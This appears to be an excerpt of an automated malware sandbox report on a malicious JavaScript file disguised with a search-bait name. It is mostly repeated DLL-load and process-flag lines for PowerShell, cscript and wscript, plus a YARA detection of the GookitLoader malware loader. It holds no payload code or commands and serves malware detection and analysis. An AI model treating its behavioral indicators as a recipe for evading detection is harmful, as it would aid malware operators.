          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: is it legal to kill a peacock in california 93889.jsStatic file information: File size 30348243 > 1048576

          Data Obfuscation

          barindex
          Yara detected GookitLoader
          Source: Yara matchFile source: amsi64_6768.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_5952.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_1888.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_5796.amsi.csv, type: OTHER

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
